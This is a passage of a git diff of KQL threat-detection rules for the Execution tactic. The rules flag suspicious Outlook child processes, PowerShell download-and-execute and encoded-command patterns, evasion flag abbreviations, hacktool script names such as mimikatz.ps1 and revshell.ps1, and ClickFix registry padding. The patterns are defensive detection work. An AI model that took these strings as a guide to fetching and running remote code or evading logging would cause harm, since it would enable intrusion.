Date: 2022-02-28 +// Level: high +// Description: Detects a suspicious process spawning from an Outlook process. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002 + +DeviceProcessEvents | where (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\msbuild.exe" or FolderPath endswith "\\msdt.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\OUTLOOK.EXE" \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql b/KQL/rules/Execution/suspicious_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql index 55de894c..b732b260 100644 --- a/KQL/rules/Execution/suspicious_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql +++ b/KQL/rules/Execution/suspicious_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-06-14 -// Level: high -// Description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script that's located in a potentially suspicious location to run for a specific VM state -// MITRE Tactic: Execution -// Tags: attack.execution, attack.persistence, attack.t1059 - -DeviceProcessEvents +// Title: Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-14 +// Level: high +// Description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script that's located in a potentially suspicious location to run for a specific VM state +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence, attack.t1059 + +DeviceProcessEvents | where (ProcessCommandLine contains " script " and ProcessCommandLine contains " set ") and (FolderPath endswith "\\VMwareToolBoxCmd.exe" or ProcessVersionInfoOriginalFileName =~ "toolbox-cmd.exe") and (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_powershell_download_and_execute_pattern.kql b/KQL/rules/Execution/suspicious_powershell_download_and_execute_pattern.kql index 84cf0d77..73426311 100644 --- a/KQL/rules/Execution/suspicious_powershell_download_and_execute_pattern.kql +++ b/KQL/rules/Execution/suspicious_powershell_download_and_execute_pattern.kql @@ -1,12 +1,12 @@ -// Title: Suspicious PowerShell Download and Execute Pattern -// Author: Florian Roth (Nextron Systems) -// Date: 2022-02-28 -// Level: high -// Description: Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive) -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001 -// False Positives: -// - Software installers that pull packages from remote systems and execute them - -DeviceProcessEvents +// Title: Suspicious PowerShell Download and Execute Pattern +// Author: Florian Roth (Nextron Systems) +// Date: 2022-02-28 +// Level: high +// Description: Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive) +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 +// False Positives: +// - Software installers that pull packages from remote systems and execute them + +DeviceProcessEvents | where ProcessCommandLine contains "IEX ((New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains "IEX (New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains "IEX((New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains "IEX(New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains " -command (New-Object System.Net.WebClient).DownloadFile(" or ProcessCommandLine contains " -c (New-Object System.Net.WebClient).DownloadFile(" \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_powershell_encoded_command_patterns.kql b/KQL/rules/Execution/suspicious_powershell_encoded_command_patterns.kql index 9fdde349..a820413c 100644 --- a/KQL/rules/Execution/suspicious_powershell_encoded_command_patterns.kql +++ b/KQL/rules/Execution/suspicious_powershell_encoded_command_patterns.kql @@ -1,12 +1,12 @@ -// Title: Suspicious PowerShell Encoded Command Patterns -// Author: Florian Roth (Nextron Systems) -// Date: 2022-05-24 -// Level: high -// Description: Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001 -// False Positives: -// - Other tools that work with encoded scripts in the command line instead of script files - -DeviceProcessEvents +// Title: Suspicious PowerShell Encoded Command Patterns +// Author: Florian Roth (Nextron Systems) +// Date: 2022-05-24 +// Level: high +// Description: Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 +// False Positives: +// - Other tools that work with encoded scripts in the command line instead of script files + +DeviceProcessEvents | where ((ProcessCommandLine contains " JAB" or ProcessCommandLine contains " SUVYI" or ProcessCommandLine contains " SQBFAFgA" or ProcessCommandLine contains " aWV4I" or ProcessCommandLine contains " IAB" or ProcessCommandLine contains " PAA" or ProcessCommandLine contains " aQBlAHgA") and (ProcessCommandLine contains " -e " or ProcessCommandLine contains " -en " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -enco") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.Exe", "pwsh.dll")))) and (not((InitiatingProcessFolderPath contains "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or InitiatingProcessFolderPath contains "\\gc_worker.exe"))) \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_powershell_iex_execution_patterns.kql b/KQL/rules/Execution/suspicious_powershell_iex_execution_patterns.kql index 633a6128..75a1dcc8 100644 --- a/KQL/rules/Execution/suspicious_powershell_iex_execution_patterns.kql +++ b/KQL/rules/Execution/suspicious_powershell_iex_execution_patterns.kql @@ -1,12 +1,12 @@ -// Title: Suspicious PowerShell IEX Execution Patterns -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-03-24 -// Level: high -// Description: Detects suspicious ways to run Invoke-Execution using IEX alias -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001 -// False Positives: -// - Legitimate scripts that use IEX - -DeviceProcessEvents +// Title: Suspicious PowerShell IEX Execution Patterns +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-03-24 +// Level: high +// Description: Detects suspicious ways to run Invoke-Execution using IEX alias +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 +// False Positives: +// - Legitimate scripts that use IEX + +DeviceProcessEvents | where (((ProcessCommandLine contains " | iex;" or ProcessCommandLine contains " | iex " or ProcessCommandLine contains " | iex}" or ProcessCommandLine contains " | IEX ;" or ProcessCommandLine contains " | IEX -Error" or ProcessCommandLine contains " | IEX (new" or ProcessCommandLine contains ");IEX ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "::FromBase64String" or ProcessCommandLine contains ".GetString([System.Convert]::")) or (ProcessCommandLine contains ")|iex;$" or ProcessCommandLine contains ");iex($" or ProcessCommandLine contains ");iex $" or ProcessCommandLine contains " | IEX | " or ProcessCommandLine contains " | iex\\\"") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_powershell_parameter_substring.kql b/KQL/rules/Execution/suspicious_powershell_parameter_substring.kql index 111b5f53..3c9d2594 100644 --- a/KQL/rules/Execution/suspicious_powershell_parameter_substring.kql +++ b/KQL/rules/Execution/suspicious_powershell_parameter_substring.kql @@ -1,10 +1,10 @@ -// Title: Suspicious PowerShell Parameter Substring -// Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix) -// Date: 2019-01-16 -// Level: high -// Description: Detects suspicious PowerShell invocation with a parameter substring -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001 - -DeviceProcessEvents +// Title: Suspicious PowerShell Parameter Substring +// Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix) +// Date: 2019-01-16 +// Level: high +// Description: Detects suspicious PowerShell invocation with a parameter substring +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 + +DeviceProcessEvents | where (ProcessCommandLine contains " -windowstyle h " or ProcessCommandLine contains " -windowstyl h" or ProcessCommandLine contains " -windowsty h" or ProcessCommandLine contains " -windowst h" or ProcessCommandLine contains " -windows h" or ProcessCommandLine contains " -windo h" or ProcessCommandLine contains " -wind h" or ProcessCommandLine contains " -win h" or ProcessCommandLine contains " -wi h" or ProcessCommandLine contains " -win h " or ProcessCommandLine contains " -win hi " or ProcessCommandLine contains " -win hid " or ProcessCommandLine contains " -win hidd " or ProcessCommandLine contains " -win hidde " or ProcessCommandLine contains " -NoPr " or ProcessCommandLine contains " -NoPro " or ProcessCommandLine contains " -NoProf " or ProcessCommandLine contains " -NoProfi " or ProcessCommandLine contains " -NoProfil " or ProcessCommandLine contains " -nonin " or ProcessCommandLine contains " -nonint " or ProcessCommandLine contains " -noninte " or ProcessCommandLine contains " -noninter " or ProcessCommandLine contains " -nonintera " or ProcessCommandLine contains " -noninterac " or ProcessCommandLine contains " -noninteract " or ProcessCommandLine contains " -noninteracti " or ProcessCommandLine contains " -noninteractiv " or ProcessCommandLine contains " -ec " or ProcessCommandLine contains " -encodedComman " or ProcessCommandLine contains " -encodedComma " or ProcessCommandLine contains " -encodedComm " or ProcessCommandLine contains " -encodedCom " or ProcessCommandLine contains " -encodedCo " or ProcessCommandLine contains " -encodedC " or ProcessCommandLine contains " -encoded " or ProcessCommandLine contains " -encode " or ProcessCommandLine contains " -encod " or ProcessCommandLine contains " -enco " or ProcessCommandLine contains " -en " or ProcessCommandLine contains " -executionpolic " or ProcessCommandLine contains " -executionpoli " or ProcessCommandLine contains " -executionpol " or ProcessCommandLine contains " -executionpo " or ProcessCommandLine contains " -executionp " or ProcessCommandLine contains " -execution bypass" or ProcessCommandLine contains " -executio bypass" or ProcessCommandLine contains " -executi bypass" or ProcessCommandLine contains " -execut bypass" or ProcessCommandLine contains " -execu bypass" or ProcessCommandLine contains " -exec bypass" or ProcessCommandLine contains " -exe bypass" or ProcessCommandLine contains " -ex bypass" or ProcessCommandLine contains " -ep bypass" or ProcessCommandLine contains " /windowstyle h " or ProcessCommandLine contains " /windowstyl h" or ProcessCommandLine contains " /windowsty h" or ProcessCommandLine contains " /windowst h" or ProcessCommandLine contains " /windows h" or ProcessCommandLine contains " /windo h" or ProcessCommandLine contains " /wind h" or ProcessCommandLine contains " /win h" or ProcessCommandLine contains " /wi h" or ProcessCommandLine contains " /win h " or ProcessCommandLine contains " /win hi " or ProcessCommandLine contains " /win hid " or ProcessCommandLine contains " /win hidd " or ProcessCommandLine contains " /win hidde " or ProcessCommandLine contains " /NoPr " or ProcessCommandLine contains " /NoPro " or ProcessCommandLine contains " /NoProf " or ProcessCommandLine contains " /NoProfi " or ProcessCommandLine contains " /NoProfil " or ProcessCommandLine contains " /nonin " or ProcessCommandLine contains " /nonint " or ProcessCommandLine contains " /noninte " or ProcessCommandLine contains " /noninter " or ProcessCommandLine contains " /nonintera " or ProcessCommandLine contains " /noninterac " or ProcessCommandLine contains " /noninteract " or ProcessCommandLine contains " /noninteracti " or ProcessCommandLine contains " /noninteractiv " or ProcessCommandLine contains " /ec " or ProcessCommandLine contains " /encodedComman " or ProcessCommandLine contains " /encodedComma " or ProcessCommandLine contains " /encodedComm " or ProcessCommandLine contains " /encodedCom " or ProcessCommandLine contains " /encodedCo " or ProcessCommandLine contains " /encodedC " or ProcessCommandLine contains " /encoded " or ProcessCommandLine contains " /encode " or ProcessCommandLine contains " /encod " or ProcessCommandLine contains " /enco " or ProcessCommandLine contains " /en " or ProcessCommandLine contains " /executionpolic " or ProcessCommandLine contains " /executionpoli " or ProcessCommandLine contains " /executionpol " or ProcessCommandLine contains " /executionpo " or ProcessCommandLine contains " /executionp " or ProcessCommandLine contains " /execution bypass" or ProcessCommandLine contains " /executio bypass" or ProcessCommandLine contains " /executi bypass" or ProcessCommandLine contains " /execut bypass" or ProcessCommandLine contains " /execu bypass" or ProcessCommandLine contains " /exec bypass" or ProcessCommandLine contains " /exe bypass" or ProcessCommandLine contains " /ex bypass" or ProcessCommandLine contains " /ep bypass") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_powershell_parent_process.kql b/KQL/rules/Execution/suspicious_powershell_parent_process.kql index efd2aef9..f83f1038 100644 --- a/KQL/rules/Execution/suspicious_powershell_parent_process.kql +++ b/KQL/rules/Execution/suspicious_powershell_parent_process.kql @@ -1,12 +1,12 @@ -// Title: Suspicious PowerShell Parent Process -// Author: Teymur Kheirkhabarov, Harish Segar -// Date: 2020-03-20 -// Level: high -// Description: Detects a suspicious or uncommon parent processes of PowerShell -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001 -// False Positives: -// - Other scripts - -DeviceProcessEvents +// Title: Suspicious PowerShell Parent Process +// Author: Teymur Kheirkhabarov, Harish Segar +// Date: 2020-03-20 +// Level: high +// Description: Detects a suspicious or uncommon parent processes of PowerShell +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 +// False Positives: +// - Other scripts + +DeviceProcessEvents | where (InitiatingProcessFolderPath contains "tomcat" or (InitiatingProcessFolderPath endswith "\\amigo.exe" or InitiatingProcessFolderPath endswith "\\browser.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\jbosssvc.exe" or InitiatingProcessFolderPath endswith "\\microsoftedge.exe" or InitiatingProcessFolderPath endswith "\\microsoftedgecp.exe" or InitiatingProcessFolderPath endswith "\\MicrosoftEdgeSH.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\sqlagent.exe" or InitiatingProcessFolderPath endswith "\\sqlserver.exe" or InitiatingProcessFolderPath endswith "\\sqlservr.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessCommandLine contains "/c powershell" or ProcessCommandLine contains "/c pwsh") or ProcessVersionInfoFileDescription =~ "Windows PowerShell" or ProcessVersionInfoProductName =~ "PowerShell Core 6" or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_process_created_via_wmic_exe.kql b/KQL/rules/Execution/suspicious_process_created_via_wmic_exe.kql index 327453f1..bb7f2743 100644 --- a/KQL/rules/Execution/suspicious_process_created_via_wmic_exe.kql +++ b/KQL/rules/Execution/suspicious_process_created_via_wmic_exe.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Process Created Via Wmic.EXE -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2020-10-12 -// Level: high -// Description: Detects WMIC executing "process call create" with suspicious calls to processes such as "rundll32", "regsrv32", etc. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1047 - -DeviceProcessEvents +// Title: Suspicious Process Created Via Wmic.EXE +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-10-12 +// Level: high +// Description: Detects WMIC executing "process call create" with suspicious calls to processes such as "rundll32", "regsrv32", etc. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047 + +DeviceProcessEvents | where (ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "%ProgramData%" or ProcessCommandLine contains "%appdata%" or ProcessCommandLine contains "%comspec%" or ProcessCommandLine contains "%localappdata%") and (ProcessCommandLine contains "process " and ProcessCommandLine contains "call " and ProcessCommandLine contains "create ") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_program_names.kql b/KQL/rules/Execution/suspicious_program_names.kql index 8682999e..7b2928ef 100644 --- a/KQL/rules/Execution/suspicious_program_names.kql +++ b/KQL/rules/Execution/suspicious_program_names.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Program Names -// Author: Florian Roth (Nextron Systems) -// Date: 2022-02-11 -// Level: high -// Description: Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 -// False Positives: -// - Legitimate tools that accidentally match on the searched patterns - -DeviceProcessEvents +// Title: Suspicious Program Names +// Author: Florian Roth (Nextron Systems) +// Date: 2022-02-11 +// Level: high +// Description: Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Legitimate tools that accidentally match on the searched patterns + +DeviceProcessEvents | where (ProcessCommandLine contains "inject.ps1" or ProcessCommandLine contains "Invoke-CVE" or ProcessCommandLine contains "pupy.ps1" or ProcessCommandLine contains "payload.ps1" or ProcessCommandLine contains "beacon.ps1" or ProcessCommandLine contains "PowerView.ps1" or ProcessCommandLine contains "bypass.ps1" or ProcessCommandLine contains "obfuscated.ps1" or ProcessCommandLine contains "obfusc.ps1" or ProcessCommandLine contains "obfus.ps1" or ProcessCommandLine contains "obfs.ps1" or ProcessCommandLine contains "evil.ps1" or ProcessCommandLine contains "MiniDogz.ps1" or ProcessCommandLine contains "_enc.ps1" or ProcessCommandLine contains "\\shell.ps1" or ProcessCommandLine contains "\\rshell.ps1" or ProcessCommandLine contains "revshell.ps1" or ProcessCommandLine contains "\\av.ps1" or ProcessCommandLine contains "\\av_test.ps1" or ProcessCommandLine contains "adrecon.ps1" or ProcessCommandLine contains "mimikatz.ps1" or ProcessCommandLine contains "\\PowerUp_" or ProcessCommandLine contains "powerup.ps1" or ProcessCommandLine contains "\\Temp\\a.ps1" or ProcessCommandLine contains "\\Temp\\p.ps1" or ProcessCommandLine contains "\\Temp\\1.ps1" or ProcessCommandLine contains "Hound.ps1" or ProcessCommandLine contains "encode.ps1" or ProcessCommandLine contains "powercat.ps1") or ((FolderPath contains "\\CVE-202" or FolderPath contains "\\CVE202") or (FolderPath endswith "\\poc.exe" or FolderPath endswith "\\artifact.exe" or FolderPath endswith "\\artifact64.exe" or FolderPath endswith "\\artifact_protected.exe" or FolderPath endswith "\\artifact32.exe" or FolderPath endswith "\\artifact32big.exe" or FolderPath endswith "obfuscated.exe" or FolderPath endswith "obfusc.exe" or FolderPath endswith "\\meterpreter")) \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_remote_child_process_from_outlook.kql b/KQL/rules/Execution/suspicious_remote_child_process_from_outlook.kql index 3b5c4ad0..ea0fa1fc 100644 --- a/KQL/rules/Execution/suspicious_remote_child_process_from_outlook.kql +++ b/KQL/rules/Execution/suspicious_remote_child_process_from_outlook.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Remote Child Process From Outlook -// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems) -// Date: 2018-12-27 -// Level: high -// Description: Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares). -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.t1059, attack.t1202 - -DeviceProcessEvents +// Title: Suspicious Remote Child Process From Outlook +// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems) +// Date: 2018-12-27 +// Level: high +// Description: Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares). +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1059, attack.t1202 + +DeviceProcessEvents | where FolderPath startswith "\\\\" and InitiatingProcessFolderPath endswith "\\outlook.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_runscripthelper_exe.kql b/KQL/rules/Execution/suspicious_runscripthelper_exe.kql index 67f482ff..d4bcb169 100644 --- a/KQL/rules/Execution/suspicious_runscripthelper_exe.kql +++ b/KQL/rules/Execution/suspicious_runscripthelper_exe.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Runscripthelper.exe -// Author: Victor Sergeev, oscd.community -// Date: 2020-10-09 -// Level: medium -// Description: Detects execution of powershell scripts via Runscripthelper.exe -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202 - -DeviceProcessEvents +// Title: Suspicious Runscripthelper.exe +// Author: Victor Sergeev, oscd.community +// Date: 2020-10-09 +// Level: medium +// Description: Detects execution of powershell scripts via Runscripthelper.exe +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202 + +DeviceProcessEvents | where ProcessCommandLine contains "surfacecheck" and FolderPath endswith "\\Runscripthelper.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_scan_loop_network.kql b/KQL/rules/Execution/suspicious_scan_loop_network.kql index c077a6ca..909af7df 100644 --- a/KQL/rules/Execution/suspicious_scan_loop_network.kql +++ b/KQL/rules/Execution/suspicious_scan_loop_network.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Scan Loop Network -// Author: frack113 -// Date: 2022-03-12 -// Level: medium -// Description: Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059, attack.discovery, attack.t1018 -// False Positives: -// - Legitimate script - -DeviceProcessEvents +// Title: Suspicious Scan Loop Network +// Author: frack113 +// Date: 2022-03-12 +// Level: medium +// Description: Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, attack.discovery, attack.t1018 +// False Positives: +// - Legitimate script + +DeviceProcessEvents | where (ProcessCommandLine contains "for " or ProcessCommandLine contains "foreach ") and (ProcessCommandLine contains "nslookup" or ProcessCommandLine contains "ping") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_script_execution_from_temp_folder.kql b/KQL/rules/Execution/suspicious_script_execution_from_temp_folder.kql index c7016d0b..afe5bb3a 100644 --- a/KQL/rules/Execution/suspicious_script_execution_from_temp_folder.kql +++ b/KQL/rules/Execution/suspicious_script_execution_from_temp_folder.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Script Execution From Temp Folder -// Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton -// Date: 2021-07-14 -// Level: high -// Description: Detects a suspicious script executions from temporary folder -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 -// False Positives: -// - Administrative scripts - -DeviceProcessEvents +// Title: Suspicious Script Execution From Temp Folder +// Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton +// Date: 2021-07-14 +// Level: high +// Description: Detects a suspicious script executions from temporary folder +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Administrative scripts + +DeviceProcessEvents | where ((ProcessCommandLine contains "\\Windows\\Temp" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming\\Temp" or ProcessCommandLine contains "%TEMP%" or ProcessCommandLine contains "%TMP%" or ProcessCommandLine contains "%LocalAppData%\\Temp") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe")) and (not((ProcessCommandLine contains " >" or ProcessCommandLine contains "Out-File" or ProcessCommandLine contains "ConvertTo-Json" or ProcessCommandLine contains "-WindowStyle hidden -Verb runAs" or ProcessCommandLine contains "\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Temp\\Amazon\\EC2-Windows\\"))) \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_space_characters_in_runmru_registry_path_clickfix.kql b/KQL/rules/Execution/suspicious_space_characters_in_runmru_registry_path_clickfix.kql index ed803c53..bcf322f4 100644 --- a/KQL/rules/Execution/suspicious_space_characters_in_runmru_registry_path_clickfix.kql +++ b/KQL/rules/Execution/suspicious_space_characters_in_runmru_registry_path_clickfix.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Space Characters in RunMRU Registry Path - ClickFix -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-11-04 -// Level: high -// Description: Detects the occurrence of numerous space characters in RunMRU registry paths, which may indicate execution via phishing lures using clickfix techniques to hide malicious commands in the Windows Run dialog box from naked eyes. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1204.004, attack.defense-evasion, attack.t1027.010 -// False Positives: -// - Unlikely - -DeviceRegistryEvents +// Title: Suspicious Space Characters in RunMRU Registry Path - ClickFix +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-11-04 +// Level: high +// Description: Detects the occurrence of numerous space characters in RunMRU registry paths, which may indicate execution via phishing lures using clickfix techniques to hide malicious commands in the Windows Run dialog box from naked eyes. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.004, attack.defense-evasion, attack.t1027.010 +// False Positives: +// - Unlikely + +DeviceRegistryEvents | where (RegistryValueData contains "#" and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU*") and (RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains " ") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql b/KQL/rules/Execution/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql index 0665c764..0800c15e 100644 --- a/KQL/rules/Execution/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql +++ b/KQL/rules/Execution/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Space Characters in TypedPaths Registry Path - FileFix -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-11-04 -// Level: high -// Description: Detects the occurrence of numerous space characters in TypedPaths registry paths, which may indicate execution via phishing lures using file-fix techniques to hide malicious commands. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1204.004, attack.defense-evasion, attack.t1027.010 -// False Positives: -// - Unlikely - -DeviceRegistryEvents +// Title: Suspicious Space Characters in TypedPaths Registry Path - FileFix +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-11-04 +// Level: high +// Description: Detects the occurrence of numerous space characters in TypedPaths registry paths, which may indicate execution via phishing lures using file-fix techniques to hide malicious commands. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.004, attack.defense-evasion, attack.t1027.010 +// False Positives: +// - Unlikely + +DeviceRegistryEvents | where (RegistryValueData contains "#" and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths\\url1") and (RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains " ") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_spool_service_child_process.kql b/KQL/rules/Execution/suspicious_spool_service_child_process.kql index 780ab3de..1ab26495 100644 --- a/KQL/rules/Execution/suspicious_spool_service_child_process.kql 